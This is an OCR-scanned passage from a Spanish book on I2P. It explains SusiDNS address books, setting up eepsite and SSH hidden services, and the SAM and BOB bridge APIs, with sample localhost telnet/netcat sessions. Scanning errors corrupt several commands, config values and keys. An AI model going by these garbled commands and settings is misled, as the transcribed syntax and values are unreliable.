incluida en una instancia de I2P y cuenta con una interfaz web que permite ver y actualizar los 
registros que se encuentran almacenados en el AddressBook local. SusiDNS es una aplicacion de 
gestion muy simple y en realidad no tiene mucho interes en si misma, pero el concepto de los 
“AddressBook” y la forma en la que se manejan los sitios “*.i2p” es muy importante para comprender 
como funciona la web profunda de I2P. Como se ha explicado con anterioridad, un “ AddressBook ” 
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es un sistema de nombrado distribuido, seguro y facilmente comprensible por cualquier persona. 
Todos los mensajes I2P son cifrados y enviados a un destino concreto, sin embargo cada usuano 
puede tenerun AddressBook local que contenga las entradas para varios destinos, estos AddressBook 
pueden ser utilizados como servidores de nombrado, emulando de esta forma el funcionamiento 
de los servidores DNS. El sistema cuenta con diferentes versiones de AddressBook con registros 
diferentes que son: “ private ”, “ master ”, “ router ”, “published ” y “ suscriptions ”, estos registros son 
mezclados con cierta regularidad por SusiDNS dependiendo de las opciones de configuracion que 
tenga establecidas. 

En primer lugar, la aplicacion se encarga de consultar los contenidos del AddressBook “ suscriptions ” 
y los mezcla con el AddressBook “ router ”, luego mezcla el AddressBook “master*' con el “ router ” y 
finalmente, dependiendo de la configuracion establecida, el AddressBook “ router ” es mezclado con 
el AddressBook “ published ” el cual estara disponible al publico si se esta ejecutando un eepsite. El 
AddressBook “ private ” no es mezclado ni publicado en ningun momento, sus registros pueden ser 
accedidos desde la instancia local de I2P. pero nunca son expuestos al publico. 

Si una aplicacion como I2PTunnel o el servidor proxy incluido por defecto en I2P, necesita acceder 
a un destino por medio de un nombre de dominio especificado, como por ejemplo www.i2p2.i2p, lo 
primero que intentara sera resolver dicho nombre ejecutando una consulta local en los AddressBook 
mencionados anteriormente con el siguiente orden: 

1. Busqueda en el AddressBook privado “ Private ” 

2. Busqueda en el AddressBook “ Master ” 

3. Busqueda en el AddressBook “Router”. 

La busqueda es sensitiva a mayusculas/minusculas y las busquedas son cacheadas durante unos 
minutos para mejorar el rendimiento. Como ya se ha indicado los AddressBook de otros usuarios 
son consultados periodicamente y mezclados con los AddressBook locales ( router y master ) 
siempre y cuando exista una “suscripcion” es decir, solamente se consultaran los AddressBook de 
aquellos sitios que se encuentren registrados en el fichero de suscripciones. Esto desde luego implica 
tener un cierto nivel de confianza con aquellos sitios que se encuentran registrados en el fichero de 
suscripciones algo que no siempre es aconsejado, por esta razon el unico sitio que viene configurado 
por defecto es http://www.i2p2.i2p/hosts.txt que contiene una copia del fichero hosts.txt incluido en 
la distribucion I2P. 

Una de las primeras actividades que se puede realizar desde esta aplicacion es agregar “suscripciones” 
al AddressBook local, editando el fichero suscriptions.txt o por medio de la aplicacion SusiDNS. 
Algunos AddressBook publicos y de confianza que son recomendados por el equipo de I2P son: 

- http://i2host.i2p/cgi-bin/i2hostetag 

- http://stats.i2p/cgi-bin/newhosts.txt 

- http://tino.i2p/hosts.txt 

Esta configuracion puede ser establecida desde SusiDNS como se ensena en la imagen 02.14. 
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Imogen 02.14: Suscripciones en SusiDNS. 


Finalmente, en el AddressBook ‘ Pouter ”, es posible encontrar un listado bastante complete de 
servicios ocultos que se encuentran incluidos en los ficheros de suscripciones listados anteriormente, 
dicho listado puede ser un buen punto de partida para explorar la web profunda de I2P. 

$u$7<dns. 

Address Books: Private | Master | Router | Published • Subscriptions * Configuration * Overview 

Address book: router 

Storage: hosts.txt address book in BlockfileNamingService database 

Address book contains 3,964 entries. Showing 1-50 of 3,964 | 51-100 
Filter abcdefghijklmnopqrstuvwxyz 0-9 other all 

Search: Search 


Name Links Destination 
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Imogen 02.15: AddressBook “router " en SusiDNS. 
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2.3.1.1 Creadon de servidos ocultos y tuneles diente con I2PTunneI 

Los servicios ocultos representan la base de la web profunda de I2P y por este motivo, es importante 
saber como se pueden configurar y exponer publicamente. Un servicio oculto puede ser cualquier 
tipo de servidor TCP o UDP que se encarga de recibir peticiones por parte de los clientes y emitir 
respuestas. Funcionan exactamente igual que los servicios habituales en la web clara, pero con la 
diferencia de que existen una serie de capas adicionales que impiden que tanto el cliente como el 
servidor conozcan su procedencia, dando como resultado un anonimato mutuo. 

Para crear servicios ocultos se debe utilizar el asistente de la herramienta I2PTunnel, el cual 
permite la creacion de servicios ocultos y tuneles cliente de una forma muy simple, paso a paso. A 
continuation se explica la forma en la que se pueden crear servicios ocultos del tipo HTTP (tambien 
conocidos en la terminologia de I2P como “ eepsites”) y otros servicios de acceso remoto como SSH. 

2.3.1.2 Servicio Oculto HTTP (Eepsite) 

Un servicio oculto del tipo HTTP simplemente requiere que la instancia de I2P tenga acceso al 
servidor web que se debe exponer en la web profunda de I2P. Dicho servidor web, evidentemente 
puede contener aplicaciones de cualquier tipo y del mismo modo que cualquier otro servicio en 
Internet, es recomendable tomar las medidas de seguridad necesarias para que sea un servidor lo 
suficientemente estable ante ataques provenientes del interior de la web profunda. Dicho esto. 
es importante comprender que la creacion y configuracion de un servicio oculto del tipo HTTP 
no supone demasiadas complejidades, se debe dedicar el tiempo necesario a establecer una 
configuracion segura y resistente a “agentes maliciosos”, ya que el riesgo de ataque en este tipo de 
entornos suele ser alto y una brecha o vulnerabilidad en el servicio puede suponer una via de entrada 
para un atacante, el cual conseguira comprometer directamente el ordenador del usuario que ejecuta 
la instancia de I2P con las consecuencias que esto puede traer. Es responsabilidad del usuario llevar 
a cabo las medidas de seguridad pertinentes antes de exponer su servicio oculto y en definitiva, su 
propio ordenador personal o servidor. 

Ahora bien, todas las instalaciones de I2P vienen con un sitio web configurado por defecto el cual 
se ejecuta en un servidor web Jetty. Tal como se ha mencionado en una section anterior, sobre dicho 
servidor es posible desplegar aplicaciones web basadas en Java, soportando tecnologias tales como 
Servlets, JSP, Structs, JSF, etc. La ubicacion por defecto de dicho “eepsite” depende de la forma en 
la que se ha instalado la instancia de I2P. Si se ha instalado en modo “PORTABLE” la ruta de dicho 
eepsite es la que el usuario ha especificado y en caso contrario, la ruta sera “~/.i2p/eepsite”. 

Todos los servicios ocultos en I2P son en realidad tuneles del tipo servidor, es decir, tuneles entrantes 
y como tales, es necesario crearlos desde la aplicacion I2PTunnel. Tal como se puede apreciar en la 
imagen 02.16, el “ eepsite ” mencionado anteriormente cuenta con su propio tunel en la aplicacion 
12PTunnel y se encarga de enrutar todas las peticiones entrantes por parte de los clientes en la web 
profunda de I2P hacia el sitio web instalado en la instancia local. 

Tal como se puede apreciar en la imagen siguiente, tambien es posible configurar un nuevo servicio 
oculto, el cual se puede configurar de una forma muy simple siguiendo un asistente. Dicho asistente 
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para la creacion de servicios ocultos, solicita unos datos basicos sobre el servicio que se pretende 
configurar, siendo la direccion IP y el puerto en el que se encuentra corriendo el servicio, los 
parametros mas importantes. Tambien es posible ajustar algunas opciones de configuracion del 
tiinel de entrada que se creara, como por ejemplo el numero de participantes, definir la cantidad de 
enrutadores que compondran el tunel, cifrar el LeaseSet, restringir el acceso al tiinel por medio de 
listas blancas o negras, entre otras opciones de configuracion bastante interesantes. 



Imagen 02.16: Tunel del “eepsite” por defecto en I2P. 



Imogen 02.17: Asistente de configuracion para la creacion de servicios ocultos. 
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Una vez que se han introducido todos los datos obligatorios y se ha guardado la configuration, 
automaticamente se creara la clave correspondiente al “ Local Destination Un “. Destination ” en I2P 
es una clave de 512 bytes, las cuales deben ser traducidas a nombres de dominios que se encuentran 
en formato Base32. 



Imogen 02.18: Generacion automatica del Local Destination del servicio oculto. 

Finalmente, para completar el proceso de creation y registro del servicio oculto, la clave 
correspondiente al “ local destination ” se debe vincular a un dominio propio en I2P. Para ello 
es recomendable utilizar el servicio http://stats.i2p/ y acceder a sus servicios de “AddressBook” 
ubicados en la opcion “Addressbook Services A continuacion se debe seleccionar la opcion “the 
host/key addform ” en donde se podra ingresar la clave y el nombre de dominio que se desea registrar. 



Imogen 02.19: Registro de un eepsite en la red de I2P. 
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De esta forma quedara registrado el dominio en la red I2P. Despues de finalizar el registro del 
dominio, se ensenara informacion sobre el nombre del dominio recien creado con sufijo “i2p” y un 
enlace con la direccion en formato Base32. Con estos sencillos pasos, es posible crear y registrar un 
servicio oculto que se encontrara disponible para cualquier usuario de I2P. 

2.3.1.3 Otros tipos de servicios ocultos 

Aunque los servicios ocultos del tipo HTTP (eepsites) son los mas comunes y los que suelen utilizar 
con mayor frecuencia los usuarios de I2P, es posible crear otros servicios ocultos del tipo FTP, 
SMB, SSH, entre otros. Una de las ventajas que tiene I2P es que es posible exponer cualquier tipo 
de servicio que se encuentre en ejecucion en la maquina donde se encuentra el enrutador de I2P o 
cualquiera que sea accesible remotamente. Este es uno de los motivos por los que se considera a 
I2P como una de las redes mas robustas y mejor valoradas a la hora de crear servicios ocultos de 
forma anonima y confidencial. Por otro lado, a diferencia de otras redes anonimas como Tor, no 
existe ningun tipo de restriccion a la hora de crear servicios ocultos que funcionen sobre TCP, UDP 
o ICMP, ademas suelen ser bastante rapidos a la hora de procesar peticiones por parte de los clientes 
en comparacion con otras soluciones de anonimato. 

Del mismo modo que se ha visto anteriormente cuando se ha creado un servicio oculto del tipo 
HTTP, se debe utilizar la aplicacion I2PTunnel para crear un servicio oculto de cualquier tipo. A 
continuacion, se explica como se puede crear un servicio oculto de acceso remoto utilizando un 
servidor OpenSSH y la forma en la que se puede probar dicho servicio con un cliente.En primer lugar, 
desde la aplicacion I2PTunnel es necesario crear un tunel del tipo “estandar” utilizando el asistente 
de creacion de tuneles. Solamente es necesario indicar las opciones basicas correspondientes al 
servidor SSH que se debe encontrar en ejecucion en la direccion indicada. La imagen 02.20 ensena 
los datos basicos que se deben ingresar a la hora de crear este servicio. 



Imogen 02.20: Creacion de un tune / servidor standard en I2PTunnel. 
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Del mismo modo que ocurre con un servicio oculto del tipo HTTP, es posible establecer algunas 
propiedades de configuracion adicionales que permitan controlar el numero de participantes en el 
tunel y otras opciones de configuracion avanzadas. Una vez creado el tunel servidor, se podra iniciar 
y detener como cualquier otro servicio oculto desde I2P. 



Imogen 02.21: Gestion del servicio oculto creado. 

Ahora que se cuenta con un tunel servidor, se debe crear un tunel cliente para poder realizar 
conexiones con el tunel servidor recientemente creado. En este caso el cliente sera un tunel del 
tipo “SOCKS”, el cual debe ser seleccionado desde el asistente para la creacion de tuneles cliente. 
Aunque se trata de un tunel distinto al que se ha creado anteriormente, las opciones de configuracion 
son muy similares. 



Imogen 02.22: Creacion de un tunel cliente SOCKS en I2PTunnel. 

Para comprender la razon por la cual se deben crear dos tuneles, es importante entender que en la 
comunicacion entre dos entidades anonimas en I2P, tienen que existir dos tipos de tuneles, uno de 
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salida para que el emisor pueda enviar mensajes y uno de entrada para que el destinatario pueda 
recibirlos. En este caso, ambos tuneles se han creado en dos instancias de I2P diferentes, la primera 
actua como servidor o destinatario y la segunda como cliente o emisor. 

Del mismo modo que se ha visto anteriormente con el tunel servidor, el tunel cliente tambien debe 
ser iniciado desde I2PTunnel para poder ser utilizado desde cualquier cliente estandar. Dado que 
se trata de un servicio del tipo SSH, se puede utilizar las herramientas disponibles en el paquete 
openssh-client en sistemas basados en Unix o el programa Putty que se encuentra disponible para 
multiples plataformas. En cualquier caso, sera necesario indicarle al cliente que las peticiones deben 
pasar por medio de un servidor SOCKS, el cual represents el tunel cliente creado anteriormente. 

En el caso de utilizar Putty, la configuracion del proxy se debe hacer por medio de la opcion ubicada 
en el menu lateral en “Connection —> Proxy". A continuacion se debe seleccionar el tipo proxy 
SOCKS5, asi como la direccion IP y puertos indicados a la hora de crear el tunel cliente, los cuales 
en este caso concreto han sido la direccion IP local y el puerto “8080”. A continuacion, se debe 
ingresar la direccion en Base32 del servicio oculto y el puerto en el que se encuentra ejecutandose, 
que en este caso concreto es “diw6pco6aquhvtgynlgwc3cy3d7hv424zqyyi5sy3mt7jrhumr7a.b32. 
i2p” y el puerto es el 22. 



Imogen 02.23: Conexion con un servicio oculto utilizando un proxy SOCKS. 


En este caso concreto se ha tornado como ejemplo la creacion de un servicio oculto del tipo SSH, 
pero tal como se ha comentado en parrafos anteriores, es posible crear un servicio oculto de cualquier 
otro tipo siguiendo exactamente el mismo procedimiento que se ha explicado aqui. 


































90 


Deep Web: TOR , FreeNET& I2P - Privacidady Anonimato 


2.4 Acceso programatico 

Probablemente una de las principales caracteristicas que cualquier usuario avanzado de I2P busca 
dominar, son las APIs y librerias disponibles para acceder de forma programatica a servicios ocultos 
de la web profunda de 12P o para controlar una instancia en ejecucion. A continuacion se explican 
algunas de las posibilidades que tiene el usuario a su disposition a la hora de programar rutinas y 
automatizar tareas con APIs y librerias especificas para I2P. 


2.4.1 SAM (Simple Anonymous Messaging) 

SAM ha sido una de las primeras librerias que ha desarrollado el equipo de I2P y pretende ser una 
interfaz entre una instancia de I2P y un programa desarrollado en cualquier lenguaje de programacion. 
Para conseguir esto, en cada enrutador existe un “SAM Bridge” que se encuentra en la section de 
servicios del enrutador y que se puede arrancar manualmente o bien, indicar que se debe iniciar 
automaticamente cada vez que se levante la instancia de I2P. 

Su funcionamiento y la forma de utilizar el puente es simple, en primer lugar se debe crear una 
conexion TCP plana contra el puente de SAM, el cual tipicamente se vincula con el puerto “7656” 
y a partir de aqui, el cliente debe interactuar con el servicio por medio de una serie de comandos 
en texto piano, que le indican al puente que tareas debe realizar. Dichos comandos se encuentran 
debidamente documentados y detallados en la pagina web oficial del proyecto, concretamente en 
el siguiente enlace: https://geti2p.net/en/docs/api/samv3. Hay que tener en cuenta que actualmente 
existen tres versiones de esta libreria, sin embargo solamente se recomienda el uso de la ultima 
version disponible (SAMv3) debido a que las primeras versiones tienen bastantes fallos que se 
encuentran corregidos en SAMv3. 

SAM funciona en tres modos distintos los cuales son: 

1. Streams: Cuando un emisor y receptor quieren comunicarse de forma segura y fiable, sin 
perder informacion y de manera ordenada. 

2. Repliable datagrams: Cuando un emisor desea que el mensaje enviado pueda ser contestado 
por el destinatario. 

3. Raw datagrams: Cuando el emisor desea aprovechar el maximo ancho de banda a la hora 
de enviar sus mensajes al destinatario y ademas, el destinatario no exige que el remitente se 
encuentre autenticado. 

A continuacion se explica el uso de algunos de los comandos basicos incluidos en la especificacion 
de SAMv3 y como se realiza el proceso de comunicacion entre emisores y receptores. 

En primer lugar es necesario crear una sesion de cualquiera de los tres tipos descritos anteriormente. 
Dicha sesion es la que se encargara de generar el “ destination ” para que los participantes puedan 
comunicarse e intercambiar informacion. Para hacerlo es necesario conectarse al bridge de SAM 
utilizando cualquier herramienta de conectividad como Telnet o Netcat en el puerto “7656”. 
Evidentemente el SAM Bridge tiene que encontrarse iniciado para poder realizar una conexion 
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contra dicho puerto y para ello, es necesario dirigirse a la section de servicios del enrutador y 
posteriormente, arrancar el servicio en cuestion en el caso de que se encuentre detenido. El primer 
comando que debe ingresar cualquier usuario que se conecte al SAM Bridge corresponde a la 
selection de la version de SAM que se desea utilizar. Se trata de un comando obligatorio que le 
indica al bridge que version de SAM debe emplear durante la sesion. En el caso de no utilizar ningun 
parametro, se seleccionara la ultima version disponible en el servicio. 

El siguiente paso consiste en crear una sesion, la cual se encargara de utilizar un “ destination ” 
ya existente o generar uno de forma automatica para que tanto emisores como receptores puedan 
utilizarlo. La estructura de dicho comando es la siguiente: 

SESSION CREATE 

STYLE={STREAM,DATAGRAM,RAW) 

ID=$nickname 

DESTINATIONS $privkey, TRANSIENT} 

[option=value]* 


El parametro “ STYLE” permite declarar el uso de la sesion que se va a crear. Estos valores representan 
los tres posibles modos de funcionamiento de SAM, tal como se indicaba unos parrafos mas arriba. 
Despues de crear una sesion, es posible utilizar otros comandos para conectar dos o mas clientes o 
participantes de I2P, los cuales normalmente se conectaran de forma remota. 


adastra@Galilei:-$ telnet -e " 127.0.0.1 7656 
Telnet escape character is 'off. 

Trying 127.0.0.1... 

Connected to 127.0.0.1. 

Escape character is 'off'. 

-IELLO REPLY RESULT=0K VERSI0N=3.1 

SESSION STATUS RESULT=OK DESTINATION=NKPctxOHfhHTFtHHI8wZogslGoL7gEnKlp34MV2oxLUKlfod8foqplUjQ8DXL 
fuoixBW2zYxvKTgBaxrP5Agjied8JmDNNR5tBTa--jd5LmZJM9HSB7nlm5h5NS9Se8IEoXAFslQG5DKWWslQvXvYhl0UV8fH~b 
-W0TeMOOknFdllYMQNH-lj7HoAfNgOcjDXvU0jKJ-C)XaLeNZu2DsIHnWDt09NIUy8y9L4fTrJfgwdjDUd~pS~ADCGUL3Z9ivoo 
-9Dg4EehxMCtn4OFMd0XhDczQg64lhuagEzSd~ApW-EEd4Hmu—j~FQbI~QJtDa9~nhdU4dJoxz44WQJd9R01-eZOlyLdbGr8G 
uhfa0K9qmUDGDOAtbAaCqDKzv0nQ8OTlC8cbOdLO-34UsWv3Ysjrql-llzU7RJbitvey9pRRODEO7jdcGs7zOilLnDjjK2kv3J 
iVxpssoNiLHBjmEpo-DJ9EeHh-kjTLqUmyF7Xz-XfDyHbg3ld~ZRZeKQWSi-AAAADDlnVHoChZKOkvZUATFn5Z27GUH3oIfiNt 
h7j22AMpVqIAFEBk7tUHYa0tpPeFoT0cVxXM5YSpmep3HXiCFazV4Lgnwlb0tIdwzNK9Z74gebqxnzytlFfDmrpA0TyovidBI2 
rieXTF3YHqJaJ~bJvnw3~AbrHtpJ0OX-dVX8en8LsQHnNvuCTMpp4klV3b-AuHcZ8C6LPRlRiBtWeYuK2mLEz-iDgzbibie-au 
VJdEyYZkfeyWvsgI7sKdeMV6r4ibxdsB6~NMpx8SHdQlfcJ320lakj332vra97CNq9wzz3AmSp4S~eipnee6hVCfXS-uzuEP~6 
qBw5u9AeY-nW6GxRIuQSYhwK0B2Ek~mM6lcHx0k _ 

Imogen 02.24: Creadon de una sesion de streaming con SAM. 


En este caso, el parametro “ DESTINATION ” ha recibido el valor “ TRANSIENT ’, lo que indica que 
se debe crear de forma automatica un nuevo “ destination ” que sera utilizado por los participantes. 
A continuation, desde una consola o maquina distinta, se debe crear el “ receptor ” de los mensajes, 
para ello se debe realizar el mismo proceso de conexion indicado anteriormente, pero en lugar de 
crear una sesion nueva, se debe utilizar el que se ha creado previamente para recibir peticiones de 
conexion entrantes por parte del emisor. Es decir, se debe crear un tunel de entrada partiendo de 
dicha sesion. Para hacer esto y dado que el estilo seleccionado para la sesion ha sido “STREAM”, 
se debe ejecutar el comando “STREAMACCEPT' . La estructura de dicho comando es la siguiente: 

STREAM ACCEPT 
ID=$nickname 
[SILENT={true,false)] 
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El valor del parametro ID debe coincidir con el valor que se ha establecido al parametro “ID” a la 
hora de crear la sesion con el comando “SESSION CREATE 


3dastra@Galilei:-$ telnet -e 127.0.0.1 7656 
Telnet escape character is 'off'. 

Trying 127.0.0.1... 
lonnected to 127.0.0.1. 

Escape character is 'off'. 

iELLO REPLY RESULT=0K VERSI0N=3.1 

STREAM STATUS RESULT=OK _ 


Imogen 02.25: Habilitando conexiones entrantes en un cliente. 


Finalmente, desde una consola distinta u otra maquina, el emisor podra conectarse a la sesion 
previamente creada en el bridge y enviar mensajes a los clientes que se encuentren en estado de 
escucha, como es el caso del cliente creado anteriormente con el comando STREAM ACCEPT. En 
este caso, un emisor debe ejecutar el comando “STREAM CONNECT’ el cual le permitira conectarse 
con un cliente y enviarle mensajes en texto piano. La estructura de dicho comando es la siguiente: 

STREAM CONNECT 
ID=$nickname 

DESTINATION=$destination 
[SILENT={true,false}] 

En este caso, el emisor debe indicar el parametro “ID” y “ DESTINATION ’ los cuales deben coincidir 
con los valores que se han utilizado a la hora de generar la sesion. 


adast ra@Galilei:~$ telnet -e A 127.6.0.1 7656 
Telnet escape character is 'off'. 

Escape character is 'off'. 

Trying 127.0.0.1... 

Connected to 127.0.0.1. 

Escape character is 'off'. 

HELLO REPLY RESULT=0K VERSI0N=3.1 

HELLO REPLY RESULTMJK VERSI0N=3.1 


STREAM STATUS RESULT=0K 


NKPctxOHfhHTFtHHI8wZogslGoL7gEnKlp34MV2oxLUKlfod 

8foqplUjQ8DXLfuoixBW2zYxvKTgBaxrP5Agjicd8JmDNNR5 


tBTa--jd5LmZJM9HSB7nlm5h5NS9Se8IEoXAFslQG5DKWWs1 
QvXvYhlOUV8fH-b~W0TeMOOknFdllYMQNH■lj7HoAfNg0cjD 
XvU0jKJ-oXaLeNZu2DsIHnWDt09NIUy8y9L4fTrJfgwdjDUd 
~-pS-ADCGUL3Z9ivoo-9Dg4EehxMCtn4OFMd0XhDczQg64lhu 

agEzSd-ApW-EEd4HnHi—J~FQbI~QJtDa9-nhdU4dJoxz44WQ 
Jd9R01-eZOlyLdbGr8Guhfa0K9qmUDGDOAtbAaCqDKzv0nQ8 
QTlC8cbQdL0-34UsWv3Ysjrql-llzU7RJbitvey9pRRODE07 
]dcGs7z0ilLnDj jK2kv3JWxpssoNiLHBj mEpo-DJ9EeHh-kj 
TLqUmyF7Xz-XfDyHbq3ld-ZRZeKQWSl-AAAA 

STREAM STATUS RESULT=OK 


Imogen 02.26: Intercambio de mensajes entre un emisory receptor en 12P utilizando SAM. 


Como se puede apreciar en la imagen 02.26, utilizando el comando “STREAM CONNECT ’ un 
emisor ha podido conectarse con la sesion especificada y a continuation, se han podido intercambiar 
mensajes entre ambas instancias. 

SAM es una de las implementaciones mas simples de I2P, no obstante existen otras soluciones mas 
robustas, tales como BOB o Streaming Library, las cuales se veran en los siguientes apartados de 
este capitulo. 
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2.4.2 BOB (Basic Open Bridge) 

BOB es una librerfa disenada para realizar conexiones de streaming para y desde una instancia de 
I2P. A diferencia de SAM, se encarga de crear dos canales independientes para el procesamiento de 
comandos y de datos, lo que mejora el rendimiento general ya que las conexiones por dichos canales 
se realizan de forma paralela. BOB cuenta con un conjunto de comandos que permiten gestionar 
tuneles de entrada o salida de forma muy simple. Como cualquier interfaz de aplicacion, cuenta con 
una serie de comandos e instrucciones que permite que dos instancias se comuniquen entre ellas por 
medio de sus correspondientes tuneles en I2P. Todas las instancias de I2P tienen la posibilidad de 
gestionar un servicio de BOB desde la interfaz administrativa de I2P ubicada en la siguiente ruta: 
http://127.0.0.1:7657/configclients. 

El puerto por defecto que utiliza es el “2827”, aunque es posible cambiarlo editando el fichero 
de configuracion de BOB, el cual se encontrara ubicado en “<USER_DIR>/.i2p/bob.config”. El 
contenido por defecto de dicho fichero es el siguiente: 

#/home/adastra/. i2p/bob. config 

#Thu Jul 09 23:16:30 GMT 2015 

BOB.CFG.VER=1 

i2 cp.top.port=7 6 5 4 

BOB.host=localhost 

inbound.lengthVariance=0 

i2cp.messageReliability=none 

BOB.port=2827 

outbound.length=l 

inbound.length=l 

outbound.lengthVariance=0 

i2cp.top.host=localhost 


Es importante tener en cuenta que este fichero de configuracion solamente se crea cuando se inicia el 
servicio de BOB desde la consola de administracion de I2P, tal como se ensena en la imagen 02.27. 



Imogen 02.27: Iniciando el clienle de BOB. 
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Una de las formas mas rapidas de interactuar con la interfaz de BOB es simplemente realizar una 
conexion contra el puerto “2827” utilizando herramientas como Telnet, Socat, Netcat, entre otras. 


3dastra@Galilei:~$ telnet -e q 127.0.0.1 2827 
Telnet escape character is 'q'. 

T rying 127.0.0.1... 

Connected to 127.0.0.1. 
escape character is 'q‘. 

30B 00.00.10 
OK 

HE 

OK COMMANDS: help clear getdest getkeys getnick inhost inport list lookup newkeys option outhost c 
jtport quiet quit setkeys setnick show showprops start status stop verify visit zap 


Imogen 02.28: Comandos disponibles en BOB. 


Los comandos que se listan por medio del comando “help" permiten ver todas las posibilidades 
disponibles para un cliente a la hora de interactuar con BOB. A continuacion, se explica el 
funcionamiento de cada uno de estos comandos para que sea mucho mas claro para el lector. 


Comando 

Description 

clear 

Elimina el “ nickname ” establecido actualmente en la sesion. En 
BOB un “ nickname ” es 

equivalente a un tunel. 

setnickname <nickname> 

Crea un nuevo “ nickname ” y lo establece en la sesion actual. 

getdest 

Retoma el “ Destination" asociado al “ nickname ” establecido. 

getkeys 

Retoma el par de claves (Publica/Privada) del “ nickname ” 
establecido. 

getnick <tunel_name> 

Consulta y establece el “ nickname" en la sesion actual. Este 
valor se encuentra almacenado en la base de datos interna de 
BOB. 

inhost <hostname|IP> 

Se trata del tunel “ inbound ” que puede ser un hostname o una 
direccion IP para el “ nickname ” actual. 

inport <number> 

Se trata del puerto del tunel “ inbound ” que debe ser un puerto 
valido y disponible para el “ nickname ” actual. 

list 

Lista todos los tuneles almacenados en BOB ( nicknames ). 

lookup 

Realiza la busqueda de una direccion “i2p” y retoma el 
Destination (direccion en Base64). 

newkeys 

Genera un nuevo par de claves (Publica/Privada) para el 
“ nickname ” actual. 

option <key=value> 

Se trata de un mapa de opciones I2CP que utilizara BOB. 

outhost <hostname IP> 

Se trata del tunel “ outbound ’ que puede ser un nombre de host 
o una direccion IP para el “nickname" actual. 



























Capitulo II. I2P (Invisible Internet Projet) 


95 


Comando 

Description 

outport <number> 

Se trata del puerto del tunel “ outbound” que debe ser un 
puerto valido y disponible para el “ nickname ” actual. 

quiet <true|false> 

Cuando su valor es “ true ”, permite enviar el Destination del 
emisor para que el receptor pueda responder rapidamente al 
mensaje recibido. 

setkeys <BASE64 Keys> 

Establece un par de claves para el “ nickname ” actual. 

show 

Ensena el estado actual del “ nickname ” establecido en la 
sesion. 

showprops 

Ensena las propiedades del “ nickname ” actual. 

start 

Inicia el “ nickame ” establecido en la sesion. 

status <nickname> 

Ensena el estado del “ nickname ” establecido por parameter. 

stop 

Detiene el “ nickname ” actual. 

verify <BASE64 Destination> 

Verifica si un Destination determinado es valido. 

visit 

Se encarga de volcar toda la informacion del hilo actual al 
fichero “wrapper.log” 

zap 

Detiene BOB junto con todos sus tuneles. 

quit 

Finalizar la sesion actual y salir del interprete. 


La siguiente imagen ensena el uso de aigunos de estos comandos. 


adastra@Galilei:-$ nc -vv 127.0.6.1 2827 
Connection to 127.0.0.1 2827 port [tcp/*] succeeded 1 
BOB 00.06.10 
OK 

OK Nickname set to adastra 

OK DHoGpNRACpcGnhBlll4ZRQFj nQtNvItX7-bZylgVaD2DnaYpqB7GoBcfSgJmj hXYR13-Ul0nrkEtQB4fICotgM0XLG8LHyf' 

QVkj6rAnGSWBwX3zZaTWrH<6Up80AMDa8nN3D04coXOiL8Jn4~pcN2*7pxIL-Ox-J3aB8f3KthVxcuR27hlfJGR~BFqf~4ZdC7 
rGItokOb0qocU4gMNI-HWgfflhUv-ucFc9in~.]h-BvM2nd-KGs7EQMtRxLgVJcj7G0j9chyN37l7mB5X~vYIueORENcKgo3OT;jTAE 
9oHiVSZz7vllWH30ynUp65QdtVXLCrqsqr4n3oFnApUcX5uYY4h~24dthZfHvlTjzW0uylDFJH5mmT81HGQhtQI8g52CbnRgir 
4ItKQNq8AYPkJI2habi4ibUqBninYk6g0p9mxlMsmpMii>bQP6jenuZPpcVhAEiqJO-IyPyy0pDvg6O4-fIqmstwdQS-qq~Sts20Bti 

ikhsXifQL87wnXtiN9e-PluyNAAAA 

OK 8hHheHoeGous6nYYcToFa7O-x0GJzW9-SJ9Xmh3y6MldSol6fWyHUXCXV9RKLp8FKHg8bcZjOmPqFTub5qymwDgy3rfbYWr> 
zzLspJnVgYq7urQ8ptk4bzfRg0h0flpCKdLql73FEZ6DkBpPclIVLE0kRNyKCesMPcYivGtlFoZST3mL2im6irQktlG4PATBd< 
Nlfb2Yfa09xojlmPnocG3H0wGU5QoSUjtvENULFkPlibXDcn5~TTUpiYAXohKp7H-4OLSluBu8Xy3p~NtIMd4yI9EhdMxApI2> 
D~OrlislLFZRsepiFUHpZhIBSAP8XvCMO91l7EaOUt3EuB0K9yw-UTTePCMDdJYh8OIAF0n8wCuxkcuYvGPxcyS4MO896OA2jE 
hglmmq-YUV-f5exftA~08qR- rWIilGK5B5H3VPgW2~-isIu9piF72wEX7XOhxHPlDFJv0gVlMcolrpNLiOhHuMnqeBFRSlkFc01 
~7wet74EzLuRaPFFbVHbSdbbHAAAA 

i 


Imagen 02.29: Uso basico de BOB. 

Ahora se procede a explicar un ejemplo de uso mas concreto, en este caso el destino de las peticiones 
sera un servicio iniciado con Socat y que encargara de enrutar las peticiones entrantes al sitio web 
“thehackerway.conf en el puerto 80. En este caso, el puente que abrira Socat quedara en estado de 
escucha en el puerto 6000. Una vez hecho esto, se puede utilizar BOB para crear un tunel de salida 
que se encargara de enrutar las peticiones hacia Socat. 
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Imogen 02.30: Creadon de tunel de salida con BOB. 


Con lo anterior, se han establecido todas las propiedades necesarias para crear un tunel de salida que 
enrutara todas las peticiones a la maquina local en el puerto “6000”. Este tunel se almacena en la 
base de datos de BOB y aunque se cierre la sesion de “ Netcat ” que ha creado el tunel, dicho tunel 
permanecera abierto hasta que sea detenido de forma explicita desde la consola de administration. 


A continuation, se debe iniciar el tunel de entrada para poder completar el circuito de comunicacion 
completo y de esta forma poder recibir las respuestas. 


adast ra@Galilei: -$ 


adastra@Galilei:~$ nc 127.0.0.1 2827 
BOB 00.00.10 
OK 

OK Nickname set to client adastra 

OK ngL4Y2-r0xxGkV89dL4qnSsIl0NRwIz~n)PkipFm6SsoHyZb2lEmxY6t2OEoaaOSzEzHXweTx-5fgF20bW51UGuQFejmInmk 
wpiTOE-26lZpi8nnMUbT0PUYtJCBXW6ZUC-uF8biKzGaD-bMxHyWbRIpTT p9unRttj JAGSTpT7hLTuWtMgV3gTLh6UF7GpqD3e 
BICE2uW-qbNg-6Vh26C9Uq5EzWnC5AE9J5ix30a6hEvLB2wShu3QfEQLDoSU5F7fDYf7k6XOWEyEdv0EZKxzrLSMlCVA2a~qyA 
Qz9shNFCfg0zRu9KFOKYdLQp7um-gmlEmNfiRBuK4tlepUXlVIyy-lBvp4-fjS3e~9-U~degCBdtwzFNu-FsrrqtNPu44VW5ib 
a5o8OD8gQYv/NtGq0KJz6Ex2PsaX9L8eC4p66CjC-EO6d3JnCxa54CKEM9yg3-KKClEXByiio2xb72HrVUVh8fqF8V9hrtwMSWJ 
BgkiB-hDXlY82kCi5joyhEJhpAAAA 

OK inhost set 

